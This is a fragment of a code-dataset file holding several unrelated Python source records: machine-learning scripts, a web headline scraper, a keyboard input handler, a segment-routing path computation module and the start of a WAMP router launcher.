images\n #if t % 10000 <= 100:\n # cv2.imwrite(\"logs/images/frame\" + str(t) + \".png\", frame)\n\n\n # save our session every 10000 steps\n if t % 10000 == 0:\n saver.save(sess, \"saved_networks/pong_game-dqn.chk\", global_step=t)\n print(\"Session saved.\")\n\n if t == T_MAX:\n return\n #if score == S_MAX:\n # return\n\n\ndef Main():\n try:\n #create session\n sess = tf.InteractiveSession()\n #input layer and output layer by creating graph\n inp, out = CreateGraph()\n #train our graph on input and output with session variables\n TrainGraph(inp, out, sess)\n except KeyboardInterrupt:\n print(\"Closing Session...\")\n sess.close()\n exit()\n\nif __name__ == \"__main__\":\n Main()\n","sub_path":"RL.py","file_name":"RL.py","file_ext":"py","file_size_in_byte":7540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"254290175","text":"#!/usr/bin/env python3\n# ============================================================================\n# File: credit_card.py\n# Created: 2019-10-10\n# ----------------------------------------------------------------------------\n# Description:\n# \n# ============================================================================\nimport numpy as np\nfrom sklearn.model_selection import KFold, train_test_split\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, MinMaxScaler\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.decomposition import PCA\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn import linear_model\nimport pandas as pd\nimport time\nimport matplotlib.pyplot as plt\nfrom scikitplot.metrics import plot_confusion_matrix\nimport scikitplot.metrics as skplt\nimport seaborn as sns\nfrom matplotlib.patches import Rectangle\n\n\nfrom pylearn.logisticregression import SGDClassification\nfrom pylearn.linearmodel import Regression\nfrom pylearn.metrics import *\nfrom pylearn.multilayerperceptron import 
MultilayerPerceptron\nfrom pylearn.resampling import *\n\n\n\ndef preprocess_CC_data(filename, which_onehot = 1):\n \"\"\"\n Function for preprocessing the credit card data. Removes outliers in the\n data set, and uses one hot encoding on categorical features.\n\n Inputs:\n - filename of the data set\n - which_onehot:\n - \"1\" specifies to one hot encode the features sex, education and marriage\n - \"2\" specifies to one hot encode the features sex, education, marriage and payment history\n\n Returns:\n - The design matrix, shape (n_observations, n_features).\n - Target vector, shape (n_observations,).\n - Indices of continuous features in the data set\n \"\"\"\n\n nanDict = {}\n df = pd.read_excel(filename, header=1, skiprows=0, index_col=0, na_values=nanDict)\n df.rename(index=str, columns={\"default payment next month\": \"defaultPaymentNextMonth\"}, inplace=True)\n\n\n X = df.loc[:, df.columns != 'defaultPaymentNextMonth'].values\n y = df.loc[:, df.columns == 'defaultPaymentNextMonth'].values\n\n\n #find and remove outliers in the data\n outlier_gender1 = np.where(X[:,1] < 1)[0]\n outlier_gender2 = np.where(X[:,1] > 2)[0]\n\n outlier_education1 = np.where(X[:,2] < 1)[0]\n outlier_education2 = np.where(X[:,2] > 4)[0]\n\n outlier_marital1 = np.where(X[:,3] < 1)[0]\n outlier_marital2 = np.where(X[:,3] > 3)[0]\n\n inds = np.concatenate((outlier_gender1,\n outlier_gender2,\n outlier_education1,\n outlier_education2,\n outlier_marital1,\n outlier_marital2))\n\n\n outlier_rows = np.unique(inds)\n\n X = np.delete(X, outlier_rows, axis=0)\n y = np.delete(y, outlier_rows, axis=0)\n\n\n\n #split data into categorical and continuous features\n if which_onehot==1:\n #only marriage, sex and education onehot encoded\n categorical_inds = (1, 2, 3)\n continuous_inds = (0, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22)\n\n\n elif which_onehot==2:\n #all categories onehot encoded\n categorical_inds = (1, 2, 3, 5, 6, 7, 8, 9, 10)\n continuous_inds = (0, 4, 
11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22)\n\n else:\n print('which_onehot must be specified as either 1 or 2')\n exit(0)\n\n X_cat = X[:,categorical_inds]\n X_cont = X[:, continuous_inds]\n\n\n #onehot encode categorical data\n onehotencoder = OneHotEncoder(categories=\"auto\", sparse=False)\n preprocessor = ColumnTransformer(\n remainder=\"passthrough\",\n transformers=[\n ('onehot', onehotencoder, list(range(X_cat.shape[1])))])\n\n X_cat = preprocessor.fit_transform(X_cat)\n\n #join categorical and continuous features\n X = np.concatenate((X_cont, X_cat), axis=1)\n\n continuous_feature_inds = list(range(X_cont.shape[1]))\n\n return X, np.ravel(y), continuous_feature_inds\n\n\n\ndef credit_card_train_test(filename, which_onehot=1, balance_outcomes=True):\n\n X, y, scale_columns = preprocess_CC_data(filename,\n which_onehot=which_onehot)\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1)\n\n\n #balance training set such that outcomes are 50/50\n if balance_outcomes:\n non_default_inds = np.where(y_train==0)[0]\n default_inds = np.where(y_train==1)[0]\n\n remove_size = len(non_default_inds) - len(default_inds)\n remove_inds = np.random.choice(non_default_inds, size=remove_size, replace=False)\n\n X_train = np.delete(X, remove_inds, axis=0)\n y_train = np.delete(y, remove_inds, axis=0)\n\n minmaxscaler = MinMaxScaler()\n scaler = ColumnTransformer(\n remainder='passthrough',\n transformers=[('minmaxscaler', minmaxscaler, scale_columns)])\n\n\n X_train = scaler.fit_transform(X_train)\n X_test = scaler.transform(X_test)\n\n y_train = y_train.reshape(-1,1)\n encoder = OneHotEncoder(categories='auto')\n y_train_1hot = encoder.fit_transform(y_train).toarray()\n y_test_1hot = encoder.fit_transform(y_test.reshape(-1,1)).toarray()\n\n\n return X, X_train, X_test, y, y_train, y_train_1hot, y_test, y_test_1hot\n\n\nif __name__ == '__main__':\n 
pass\n","sub_path":"project2/src/creditcard.py","file_name":"creditcard.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"436365192","text":"import pandas as pd\nfrom selenium import webdriver\n\npath_to_chromedriver = '/Users/jonathantang/Desktop/chromedriver' \nbrowser = webdriver.Chrome(executable_path = path_to_chromedriver)\n\ntc_df = pd.DataFrame(index=np.arange(0, 19978), columns=('subject', 'url'))\narticle_index = 0\n\n#Iterate through each page\nfor page_num in range(1,1000):\n url = 'https://techcrunch.com/page/'+str(page_num)\n browser.get(url)\n \n news_items = browser.find_elements_by_class_name('river-block')\n for news_item in news_items:\n \n title = news_item.get_attribute(\"data-sharetitle\")\n url = news_item.get_attribute(\"data-permalink\")\n \n \n entry = [title, url]\n tc_df.loc[article_index]= entry\n article_index+=1\n \ntc_df.to_pickle('techcrunch_20k.pkl') ","sub_path":"techcrunch_headline_webscraper.py","file_name":"techcrunch_headline_webscraper.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"144315409","text":"from sklearn import neighbors\nimport numpy as np\n\n\n\n# read csv file into numpy\nx = np.genfromtxt(\"C:\\\\Users\\dick\\\\Desktop\\\\Machien Learning\\\\HousePrice\\\\x.csv\", dtype=np.float64, delimiter=',', skip_header=1)\ny = np.genfromtxt(\"C:\\\\Users\\dick\\\\Desktop\\\\Machien Learning\\\\HousePrice\\\\y.csv\", dtype=np.float64, delimiter=',', skip_header=1)\n\ndef lnglatWeights(row,multipler):\n return [row[0],row[1],row[2],row[3]*multipler,row[4]*multipler];\n\ngeo_rate = 100000000.\n\nx = np.apply_along_axis(lnglatWeights, 1, x,geo_rate )\nprint(x)\nprint(y)\n\n\nknc = neighbors.KNeighborsClassifier(algorithm='auto')\n\nknc.fit(x, y)\n\n# try example:\n\n# 76 Valhalla Street Sunnybank Qld 4109\n# 
4,3,2,-27.5753528,153.064843\n\nresults = knc.kneighbors([[4,3,2,-27.5753528 * geo_rate, 153.064843 * geo_rate]])\n\nprint(\"neighbors for 76 Valhalla Street Sunnybank Qld 4109: \", results[1][0])\n","sub_path":"Model/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"341334611","text":"# coding: utf-8\n\nimport numpy as np\n#1d Array\na = [1,2,3,4]\nar = np.array(a)\nprint(ar)\nprint(ar.ndim)\nprint(ar.shape)\n\n#2d Array\nb = [[1,2],[3,4],[5,6]]\nbr = np.array(b)\nprint(br)\nprint(br.ndim)\nprint(br.shape)\n\n#Shape 변경\nbr.shape = (2,3)\n\n#2d를 1d로 변경\nbr.shape = (6,)\nprint(br.ndim)\n\n#numpy dtype\nprint(br.dtype)\n\n#numpy array의 모든 원소는 같은 type임\nb[0][0] = 1.5\nbr = np.array(b)\nprint(br.dtype) #하나라도 실수면 float64 타입이 \n\n#numpy 1d Array와 2d (1-by-N) Array는 다름\nbr.shape = (1,6)\nprint(br)\nprint(br.shape)\nprint(br.ndim)\n\n#numpy array를 만드는 다양한 방법\nc = np.zeros((10,3))\nd = np.ones((5,4))\ne = np.ones((5,4))*2\nf = np.ones((5,4))+10\n\ng = np.empty((3,4))\nh = np.eye(3)\n\ni = np.arange(5)\nj = np.linspace(1,100,10)\nk = np.linspace(0,100,10)\nl = np.linspace(0,100,11)\nprint(l.ndim)\n\n\n#array indexing / slicing\n#1d\na[0]\na[1]\na[:2]\na[:3]\na[-1]\na[:-1]\n\n#2d\nbr.shape = (3,2)\nbr[0,0]\nbr[0,1]\nbr[1,0]\nbr[:,0]\n\nbr[:,0].shape #1d\nbr[:,0:1].shape #2d\n\nimport random\nm = random.random()\nn = random.gauss(0,10)\n\n#numpy를 이용한 random number 생성\nnp.random.random((3,4))\nx = np.random.random((1000000,2))\nprint(x.shape)\n\n#numpy sorting (axis=0 세로 방향 / 1 가로 방향)\nx.sort(1)\nx.sort(0)\n\n#컬럼 1과 0의 차이 계산\ny = x[:,1]-x[:,0]\n","sub_path":"semester1/프로그래밍/week4_numpy/lecture4.py","file_name":"lecture4.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"294545302","text":"from .key import Key as _Key\r\n\r\n\r\nclass Keyboard:\r\n 
__last_key = None\r\n __active_keys = list()\r\n __writing_mode = True\r\n\r\n __key_binds_down = list()\r\n __key_binds_up = list()\r\n __key_binds_pressed = list()\r\n\r\n up = 273\r\n down = 274\r\n left = 276\r\n right = 275\r\n shiftLeft = 304\r\n shiftRight = 303\r\n altLeft = 308\r\n altRight = 307\r\n ctrlLeft = 306\r\n ctrlRight = 305\r\n capslock = 301\r\n tab = 9\r\n backspace = 8\r\n enter = 13\r\n windows = 211\r\n\r\n @staticmethod\r\n def _add_binds(key_list, func, keys):\r\n keys = set(sorted(list(keys)))\r\n for key_bind in key_list:\r\n if key_bind[0] == keys:\r\n key_list.remove(key_bind)\r\n break\r\n key_list.append((keys, func))\r\n\r\n @staticmethod\r\n def key_press_down(keypress):\r\n key = _Key(keypress.key, keypress.mod, keypress.unicode)\r\n key.set_press_down()\r\n Keyboard.__last_key = key\r\n Keyboard.__active_keys.append(key)\r\n\r\n active_keys = set(key.get_type() for key in Keyboard.__active_keys)\r\n for combination in Keyboard.__key_binds_down:\r\n keys, func = combination\r\n if keys.issubset(active_keys):\r\n func()\r\n\r\n @staticmethod\r\n def key_press_up(keypress):\r\n for key in Keyboard.__active_keys:\r\n if key.get_type() == keypress.key:\r\n key.set_press_up()\r\n if Keyboard.__writing_mode and key.get_type() in (Keyboard.shiftLeft, Keyboard.shiftRight):\r\n Keyboard.reset_shift()\r\n\r\n active_keys = set(key.get_type() for key in Keyboard.__active_keys)\r\n for combination in Keyboard.__key_binds_up:\r\n keys, func = combination\r\n if keys.issubset(active_keys):\r\n func()\r\n\r\n @staticmethod\r\n def update_keys():\r\n for key in Keyboard.__active_keys:\r\n key.update()\r\n\r\n active_keys = set(key.get_type() for key in Keyboard.__active_keys)\r\n for combination in Keyboard.__key_binds_pressed:\r\n keys, func = combination\r\n if keys.issubset(active_keys):\r\n func()\r\n\r\n @staticmethod\r\n def reset_shift():\r\n for key in Keyboard.__active_keys:\r\n if key.get_mod() == 1 or key.get_mod() == 2:\r\n 
key.set_press_up()\r\n\r\n @staticmethod\r\n def reset_last_keys():\r\n for key in Keyboard.__active_keys:\r\n if not key.get_pressed():\r\n Keyboard.__active_keys.remove(key)\r\n if key == Keyboard.__last_key:\r\n Keyboard.__last_key = None\r\n\r\n @staticmethod\r\n def update():\r\n Keyboard.reset_last_keys()\r\n Keyboard.update_keys()\r\n\r\n @staticmethod\r\n def get_last():\r\n return Keyboard.__last_key\r\n\r\n @staticmethod\r\n def get_active():\r\n return Keyboard.__active_keys\r\n\r\n @staticmethod\r\n def writing_mode_on():\r\n Keyboard.__writing_mode = True\r\n\r\n @staticmethod\r\n def writing_mode_off():\r\n Keyboard.__writing_mode = False\r\n\r\n @staticmethod\r\n def get_writing_mode():\r\n return Keyboard.__writing_mode\r\n\r\n @staticmethod\r\n def set_key_bind_down(func, *keys):\r\n Keyboard._add_binds(Keyboard.__key_binds_down, func, keys)\r\n\r\n @staticmethod\r\n def set_key_bind_up(func, *keys):\r\n Keyboard._add_binds(Keyboard.__key_binds_up, func, keys)\r\n\r\n @staticmethod\r\n def set_key_bind_pressed(func, *keys):\r\n Keyboard._add_binds(Keyboard.__key_binds_pressed, func, keys)\r\n\r\n @staticmethod\r\n def key_bind_down(*keys):\r\n def wrapper(func):\r\n Keyboard.set_key_bind_down(func, *keys)\r\n return func\r\n return wrapper\r\n\r\n @staticmethod\r\n def key_bind_up(*keys):\r\n def wrapper(func):\r\n Keyboard.set_key_bind_up(func, *keys)\r\n return func\r\n return wrapper\r\n\r\n @staticmethod\r\n def key_bind_pressed(*keys):\r\n def wrapper(func):\r\n Keyboard.set_key_bind_pressed(func, *keys)\r\n return func\r\n return wrapper\r\n","sub_path":"pc_input/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"344179824","text":"from heapq import heappush, heappop, heapify\nfrom cxpasta.utils.decorators import timer\n\n\nclass Topology(object):\n\n def __init__(self, **kwargs):\n self.non_sr = set()\n 
self.nodes = self.make_nodes(kwargs.get('nodes', []))\n self.links = self.make_links(kwargs.get('links', []))\n self.topo = self.make_topo(self.links)\n\n def make_nodes(self, nodes):\n \"\"\"Turn node list into a hash table.\n If it's a non-sr node, add it to self.non_sr\n \"\"\"\n data = {}\n for node in nodes:\n id = node['id']\n data[id] = {}\n if 'ip' in node:\n data[id]['ip'] = node['ip']\n if 'sid' in node:\n data[id]['sid'] = node['sid']\n else:\n self.non_sr.add(id)\n return data\n\n def make_links(self, links):\n \"\"\"Turn link list into a hash table.\n If it's a non-sr link, add it to self.non_sr\n \"\"\"\n data = {}\n for link in links:\n id = link['id']\n data[id] = {\n 'lo': link['lo'],\n 're': link['re'],\n 'igp': link['igp'],\n 'te': link['te'],\n 'delay': link['delay'],\n 'bd': link['bd'],\n 'affi': link['affi']\n }\n if 'ip' in link:\n data[id]['ip'] = link['ip']\n if 'sid' in link:\n data[id]['sid'] = link['sid']\n else:\n self.non_sr.add(id)\n return data\n\n def make_topo(self, links):\n \"\"\"Turn link list into a hash table that represents the topology.\n \"\"\"\n data = {}\n for k, v in links.items():\n if v['lo'] not in data:\n data[v['lo']] = {}\n data[v['lo']][k] = {\n 're': v['re'],\n 'igp': v['igp'],\n 'te': v['te'],\n 'delay': v['delay']\n }\n return data\n\n\nclass SPF(object):\n\n def __init__(self, topo, src, dest, metric='igp', loose=False, top=10):\n self.topo = topo\n self.src = src\n self.dest = dest\n self.metric = metric\n self.loose = loose\n self.top = top\n\n def spf(self):\n \"\"\"Return standard SPF.\n \"\"\"\n entry = [0, self.src, [self.src]]\n sofar = {self.src: entry}\n heap = [entry]\n final = {}\n\n while sofar:\n (cost, node, prev) = heappop(heap)\n final[node] = sofar[node]\n del sofar[node]\n if node == self.dest:\n return final[node][2]\n if node in self.topo:\n for k, v in self.topo[node].items():\n nei = v['re']\n if nei not in final:\n new_cost = cost + v[self.metric]\n new_prev = [f'{p} {k} {nei}' for p in 
prev]\n new_entry = [new_cost, nei, new_prev]\n if nei not in sofar:\n sofar[nei] = new_entry\n heappush(heap, new_entry)\n elif new_cost < sofar[nei][0]:\n sofar[nei][0] = new_cost\n sofar[nei][1] = nei\n sofar[nei][2] = new_prev\n heapify(heap)\n elif new_cost == sofar[nei][0]:\n sofar[nei][2] += new_prev\n return []\n\n def non_spf(self):\n \"\"\"Return all the paths that are reachable between two nodes.\n \"\"\"\n entry = [0, self.src, [self.src]]\n sofar = {self.src: entry}\n heap = [entry]\n final = {}\n\n while sofar:\n (cost, node, prev) = heappop(heap)\n if node in final:\n final[node][2] += prev\n else:\n final[node] = sofar[node]\n del sofar[node]\n if node == self.dest and len(final[node][2]) >= self.top:\n break\n if node in self.topo:\n for k, v in self.topo[node].items():\n nei = v['re']\n new_cost = cost + v[self.metric]\n loop_prev = [f'{p} {k} {nei}' for p in prev]\n new_prev = loop_prev[:]\n if nei in final:\n for f in final[nei][2]:\n for p in loop_prev:\n if f in p:\n new_prev.remove(p)\n if new_prev:\n new_entry = [new_cost, nei, new_prev]\n if nei not in sofar:\n sofar[nei] = new_entry\n heappush(heap, new_entry)\n elif new_cost < sofar[nei][0]:\n sofar[nei][0] = new_cost\n sofar[nei][1] = nei\n sofar[nei][2] += new_prev\n heapify(heap)\n elif new_cost >= sofar[nei][0]:\n sofar[nei][2] += new_prev\n if self.dest in final:\n return final[self.dest][2]\n else:\n return []\n\n def run(self):\n \"\"\"Client-easy builder method.\n Turn path string into list of hops.\n \"\"\"\n if self.loose:\n return [path.split() for path in self.non_spf()]\n return [path.split() for path in self.spf()]\n\n\nclass Simple(Topology):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.he = self.make_filter(kwargs.get('he', None))\n self.te = self.make_filter(kwargs.get('te', None))\n\n def make_filter(self, element):\n if element in self.nodes:\n return element\n elif element in self.links:\n return element\n else:\n raise Exception(f'{element} 
does not exist.')\n\n @timer\n def run(self):\n return {\n 'paths': SPF(self.topo, self.he, self.te).run()\n }\n\n\nclass Pasta(Simple):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.metric = kwargs.get('metric', 'igp')\n if self.metric == 'latency':\n self.metric = 'delay'\n self.inc = [self.make_filter(item) for item in kwargs.get('inc', [])]\n self.man_exc = {self.make_filter(item) for item in kwargs.get('exc', [])}\n self.bd = kwargs.get('bd', 0)\n self.affi = kwargs.get('affi', 0)\n self.mask = kwargs.get('mask', 0)\n self.sorter = kwargs.get('sorter', 'metric')\n self.top = kwargs.get('top', 10)\n self.limit = kwargs.get('limit', 0)\n self.loose = kwargs.get('loose', False)\n self.dis = kwargs.get('dis', False)\n self.exclude()\n\n def on_demand_bandwidth(self):\n \"\"\"Exclude links that are not with enough bandwidth.\n \"\"\"\n for k, v in self.links.items():\n bd = v.get('bd', -1)\n if bd != -1 and bd < self.bd:\n self.exc.add(k)\n\n def affinity_and_mask(self):\n \"\"\"Exclude links that are not fullfill affinity & mask.\n affi: 0000 0001\n mask: 0000 0011\n affi & mask = 0000 0001\n ~affi & mask = 0000 0010\n link1: 0000 0001 ok\n link2: 0000 0010 invalid\n link3: 0000 0011 invalid\n \"\"\"\n try:\n affi = int(self.affi, 16)\n mask = int(self.mask, 16)\n except:\n raise Exception('Invalid affinity and mask value.')\n\n inc = affi & mask\n exc = ~affi & mask\n for k, v in self.links.items():\n link_affi = v['affi']\n if link_affi & inc != inc:\n self.exc.add(k)\n if link_affi & exc != 0:\n self.exc.add(k)\n\n def exclude(self):\n \"\"\"Add all kinds of exludes together.\n \"\"\"\n self.exc = self.man_exc.union(self.non_sr)\n if self.bd:\n self.on_demand_bandwidth()\n if self.affi and self.mask:\n self.affinity_and_mask()\n\n def remake_topo(self, exc):\n \"\"\"Re-generate topology after exclude certain nodes and links.\n \"\"\"\n return self.make_topo({\n k: v for k, v in self.links.items()\n if k not in exc and v['lo'] not in exc 
and v['re'] not in exc\n })\n\n def revert(self, sids, simple=False):\n \"\"\"Turn a list of sids into segs of paths.\n \"\"\"\n metric, loose = ('igp', False) if simple else (self.metric, self.loose)\n src, sids = sids[0], sids[1:]\n if src in self.links:\n src = self.links[src]['re']\n segs = []\n for sid in sids:\n if sid == src:\n continue\n if sid in self.links:\n lo = self.links[sid]['lo']\n re = self.links[sid]['re']\n if sid == lo:\n paths = [[lo, sid, re]]\n else:\n paths = SPF(self.topo, src, lo, metric, loose, self.top).run()\n paths = [path + [sid, re] for path in paths]\n src = re\n else:\n paths = SPF(self.topo, src, sid, metric, loose, self.top).run()\n src = sid\n segs.append(paths)\n return segs\n\n def rsv(self, paths, exc):\n \"\"\"Return paths and actually path-effected excludes after excluded.\n \"\"\"\n if not exc:\n return paths, exc\n rsv_exc = set()\n rsv_paths = paths[:]\n for path in paths:\n for e in exc:\n if e in path:\n rsv_exc.add(e)\n if path in rsv_paths:\n rsv_paths.remove(path)\n return rsv_paths, rsv_exc\n\n def detail(self, path):\n \"\"\"Supplement each path with certain details.\n \"\"\"\n links = path[1::2]\n hop = len(links)\n first_hop, links = self.links[links[0]], links[1:]\n igp, te, delay, bd = [first_hop[k] for k in ['igp', 'te', 'delay', 'bd']]\n for link in links:\n link = self.links[link]\n igp += link['igp']\n te += link['te']\n delay += link['delay']\n bd = min(bd, link['bd'])\n return {\n 'path': path,\n 'igp': igp,\n 'te': te,\n 'delay': delay,\n 'min_hop': hop,\n 'max_min_band': bd\n }\n\n def tiebreaker(self, paths, top=None, limit=None):\n \"\"\"Return TOP sorted paths with certain order and limit.\n \"\"\"\n paths = [self.detail(path) for path in paths]\n sorter = self.metric if self.sorter == 'metric' else self.sorter\n if limit:\n if self.sorter == 'max_min_band':\n paths = [path for path in paths if path[sorter] >= self.limit]\n else:\n paths = [path for path in paths if path[sorter] <= self.limit]\n 
paths = sorted(paths, key=lambda c: c[sorter], reverse=self.sorter == 'max_min_band')\n if top:\n paths = paths[:top]\n return [path['path'] for path in paths]\n\n def flatten(self, segs):\n \"\"\"Flatten segs into hop-by-hop paths\n \"\"\"\n paths = []\n for seg in segs:\n if not paths:\n paths = seg\n else:\n paths = [p1 + p2[1:] for p1 in paths for p2 in seg]\n return paths\n\n def cspf(self):\n \"\"\"Return base paths and paths after exlude.\n \"\"\"\n src = self.he\n sids = [*self.inc, self.te]\n segs = []\n rsv_segs = []\n for sid in sids:\n paths = self.revert([src, sid])[0]\n rsv_paths, rsv_exc = self.rsv(paths, self.exc)\n if not rsv_paths:\n rsv_topo = self.remake_topo(self.exc)\n topo = self.remake_topo(rsv_exc)\n rsv_paths = SPF(rsv_topo, src, sid, self.metric, self.loose, self.top).run()\n paths += SPF(topo, src, sid, self.metric, self.loose, self.top).run()\n paths += [path for path in rsv_paths if path not in paths]\n segs.append(paths)\n rsv_segs.append(rsv_paths)\n src = sid\n paths = self.tiebreaker(self.flatten(segs))\n rsv_paths = self.tiebreaker(self.flatten(rsv_segs), self.top, self.limit)\n return paths, rsv_paths\n\n def entropy(self, nodes, paths):\n \"\"\"Node entropy by its counts in paths.\n If entropy is greater that 2, it's maybe a cross-node.\n \"\"\"\n ent = {}\n for node in nodes:\n weight = 0\n for path in paths:\n if node in path:\n weight += 1\n ent[node] = weight\n return ent\n\n def cut(self, paths, src, dest):\n \"\"\"Cut paths with certain start & end.\n \"\"\"\n rsv_segs = []\n for path in paths:\n if src in path and dest in path:\n idx_src = path.index(src)\n idx_dest = path.index(dest)\n path = path[idx_src:idx_dest + 1]\n if path not in rsv_segs:\n rsv_segs.append(path)\n return rsv_segs\n\n def match(self, rsv_paths, path, src, dest):\n \"\"\"Return if cspf-paths matches spf-paths.\n \"\"\"\n spf_segs = SPF(self.topo, src, dest, 'igp').run()\n rsv_segs = self.cut(rsv_paths, src, dest)\n rsv_seg = self.cut([path], src, 
dest)[0]\n if rsv_seg not in spf_segs:\n return False\n else:\n for path in spf_segs:\n if path not in rsv_segs:\n return False\n return True\n\n def encode(self, paths, rsv_paths):\n \"\"\"Return encoded sids list.\n \"\"\"\n sids_paths = []\n rev_paths = []\n for path in rsv_paths:\n if path not in rev_paths:\n sids = []\n nodes = [hop for hop in path[::2]]\n entropy = self.entropy(nodes, paths)\n print(entropy)\n xnodes = [ent for ent in entropy if entropy[ent] > 1]\n if len(xnodes) > 2:\n head = self.he\n src = self.he\n temp = xnodes[1]\n for xnode in xnodes[1:]:\n if not self.match(rsv_paths, path, src, xnode):\n idx = path.index(src)\n node_adj = path[idx: idx + 2]\n sids += node_adj\n head = path[idx + 2]\n elif head != src:\n if entropy[src] >= entropy[temp]:\n temp = src\n if not self.match(rsv_paths, path, head, xnode):\n if temp != src and head != temp:\n if not self.match(rsv_paths, path, temp, xnode):\n sids.append(src)\n head = src\n else:\n sids.append(temp)\n head = temp\n else:\n sids.append(src)\n head = src\n src = xnode\n else:\n head = self.he\n for node in nodes[1:]:\n if not self.match(rsv_paths, path, head, node):\n idx = path.index(node)\n sids += path[idx - 2: idx]\n head = node\n sids.append(self.te)\n segs = self.revert([self.he, *sids], True)\n rev_path = self.flatten(segs)\n sids_paths.append((sids, rev_path, segs))\n rev_paths += rev_path\n return sids_paths\n\n def disjoint(self, paths):\n \"\"\"Return disjoint paths.\n \"\"\"\n node_exc = {node for path in paths for node in path[2:-2:2]}\n link_exc = {link for path in paths for link in path[1::2]}\n cache_exc = set(self.exc)\n self.exc = self.exc.union(node_exc)\n paths, rsv_paths = self.cspf()\n if not rsv_paths:\n self.exc = cache_exc.union(link_exc)\n paths, rsv_paths = self.cspf()\n return paths, rsv_paths\n\n def sids(self, sids):\n \"\"\"Supplement sid with certain details.\n \"\"\"\n res = []\n for sid in sids:\n if sid in self.nodes:\n res.append({'id': sid, 
**self.nodes[sid]})\n else:\n res.append({'id': sid, **self.links[sid]})\n return res\n\n def tradeoff(self, paths):\n res = self.detail(paths[0])\n del res['path']\n for path in paths[1:]:\n detail = self.detail(path)\n res['igp'] = min(res['igp'], detail['igp'])\n res['te'] = min(res['te'], detail['te'])\n res['delay'] = min(res['delay'], detail['delay'])\n res['min_hop'] = min(res['min_hop'], detail['min_hop'])\n res['max_min_band'] = max(res['max_min_band'], detail['max_min_band'])\n return res\n\n @timer\n def run(self):\n \"\"\"Client-easy builder method.\n \"\"\"\n paths, rsv_paths = self.cspf()\n self.loose = False\n sids_paths = self.encode(paths, rsv_paths)\n if not sids_paths:\n res = {\n 'sids': [],\n 'paths': [],\n 'segs': [],\n 'attr': {},\n 'other': []\n }\n return res\n collection = [{\n 'sids': self.sids(sids),\n 'paths': paths,\n 'segs': segs,\n 'attr': self.tradeoff(paths)\n } for sids, paths, segs in sids_paths]\n res = {\n **collection[0],\n 'other': collection[1:]\n }\n if self.dis:\n res.update({\n 'd_sids': [],\n 'd_paths': [],\n 'd_other': []\n })\n best_paths = sids_paths[0][1]\n d_paths, d_rsv_paths = self.disjoint(best_paths)\n if d_rsv_paths:\n d_sids_paths = self.encode(d_paths, d_rsv_paths)\n d_collection = [{\n 'd_sids': self.sids(sids),\n 'd_paths': paths,\n 'd_segs': segs,\n 'd_attr': self.tradeoff(paths)\n } for sids, paths, segs in d_sids_paths]\n res.update({\n **d_collection[0],\n 'd_other': d_collection[1:]\n })\n return res\n\n\nclass Path(Topology):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.sids = kwargs.get('sids', [])\n self.sids_list = kwargs.get('sids_list', [])\n\n def revert(self, sids):\n \"\"\"Turn a list of sids into segs of paths.\n \"\"\"\n src, sids = sids[0], sids[1:]\n if src in self.links:\n src = self.links[src]['re']\n segs = []\n for sid in sids:\n if sid == src:\n continue\n if sid in self.links:\n lo = self.links[sid]['lo']\n re = self.links[sid]['re']\n if sid == lo:\n paths = 
[[lo, sid, re]]\n else:\n paths = SPF(self.topo, src, lo).run()\n paths = [path + [sid, re] for path in paths]\n src = re\n else:\n paths = SPF(self.topo, src, sid).run()\n src = sid\n segs.append(paths)\n return segs\n\n def flatten(self, segs):\n \"\"\"Flatten segs into hop-by-hop paths\n \"\"\"\n paths = []\n for seg in segs:\n if not paths:\n paths = seg\n else:\n paths = [p1 + p2[1:] for p1 in paths for p2 in seg]\n return paths\n\n @timer\n def run(self):\n \"\"\"Client-easy builder method.\n \"\"\"\n if self.sids:\n segs = self.revert(self.sids)\n paths = self.flatten(segs)\n return {\n 'paths': paths,\n 'segs': segs\n }\n if self.sids_list:\n paths_list = []\n segs_list = []\n for sids in self.sids_list:\n segs = self.revert(sids)\n paths = self.flatten(segs)\n paths_list += [paths]\n segs_list += [segs]\n return {\n 'paths': paths_list,\n 'segs': segs_list\n }\n","sub_path":"services/vista-backend/cxpasta/utils/pasta.py","file_name":"pasta.py","file_ext":"py","file_size_in_byte":20734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"462590374","text":"import asyncio\nimport logging\n\nfrom autobahn.asyncio import wamp, websocket\n\nfrom input import myo\nfrom ninja import service as ninja_service\nfrom services import bart_service\nfrom services import hue_service\n\nHUE_ENABLE = False\nBART_ENABLE = False\nMYO_ENABLE = False\nNINJA_ENABLE = True\n\n# logging.basicConfig(level=logging.DEBUG)\n\n\nif __name__ == '__main__':\n # 1) create a WAMP router factory\n router_factory = wamp.RouterFactory()\n # 2) create a WAMP router session factory\n session_factory = wamp.RouterSessionFactory(router_factory)\n\n # 3) add embedded WAMP application sessions to the router\n if HUE_ENABLE:\n session_factory.add(hue_service.HueService())\n print('enabled Hue service')\n if BART_ENABLE:\n session_factory.add(bart_service.BartService())\n print('enabled BART service')\n if MYO_ENABLE:\n 
